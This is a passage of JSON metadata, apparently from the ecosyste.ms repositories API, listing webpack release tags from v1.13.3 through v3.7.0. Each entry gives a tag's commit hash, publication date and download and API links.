7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"n